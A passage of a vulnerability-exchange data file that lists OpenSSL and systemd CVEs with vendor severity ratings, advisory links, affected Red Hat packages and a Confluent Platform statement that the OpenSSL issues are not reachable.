          "url": "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28388"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28388"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:20+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-28389",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: During processing of a crafted CMS EnvelopedData message\nwith KeyAgreeRecipientInfo a NULL pointer dereference can happen.\n\nImpact summary: Applications that process attacker-controlled CMS data may\ncrash before authentication or cryptographic operations occur resulting in\nDenial of Service.\n\nWhen a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is\nprocessed, the optional parameters field of KeyEncryptionAlgorithmIdentifier\nis examined without checking for its presence. This results in a NULL\npointer dereference if the field is missing.\n\nApplications and services that call CMS_decrypt() on untrusted input\n(e.g., S/MIME processing or CMS-based protocols) are vulnerable.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-28389"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-28389"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-7x88-9hgc-69gf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28389"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260407.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8155-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-28389"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/07/11"
        }
      ],
      "published": "2026-04-07T22:16:21+00:00",
      "updated": "2026-07-24T23:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-29111",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        269
      ],
      "description": "systemd, a system and service manager, (as PID 1) hits an assert and freezes execution when an unprivileged IPC API call is made with spurious data. On version v249 and older the effect is not an assert, but stack overwriting, with the attacker controlled content. From version v250 and newer this is not possible as the safety check causes an assert instead. This IPC call was added in v239, so versions older than that are not affected. Versions 260-rc1, 259.2, 258.5, and 257.11 contain patches. No known workarounds are available.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-29111"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29111"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19068"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19213"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-29111"
        },
        {
          "url": "https://bugzilla.redhat.com/2450505"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450505"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-29111"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19068.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19213"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.9.0/BRSA-jk0fvdm3ylf0.toml"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/1d22f706bd04f45f8422e17fbde3f56ece17758a"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/20021e7686426052e3a7505425d7e12085feb2a6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/21167006574d6b83813c7596759b474f56562412"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/3cee294fe8cf4fa0eff933ab21416d099942cabd"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/42aee39107fbdd7db1ccd402a2151822b2805e9f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/54588d2dedff54bfb6036670820650e4ea74628f"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/7ac3220213690e8a8d6d2a6e81e43bd1dce01d69"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/80acea4ef80a4bb78560ed970c34952299b890d6"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/b5fd14693057e5f2c9b4a49603be64ec3608ff6c"
        },
        {
          "url": "https://github.com/systemd/systemd/commit/efa6ba2ab625aaa160ac435a09e6482fc63bdbe8"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-gx6q-6f99-m764"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-29111.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19213.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29111"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8119-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-29111"
        }
      ],
      "published": "2026-03-23T22:16:26+00:00",
      "updated": "2026-06-17T10:29:37+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "239-82.el8_10.17",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd-pam@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/systemd@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/systemd-libs@239-82.el8_10.17?arch=x86_64&distro=redhat-8.10"
        },
        {
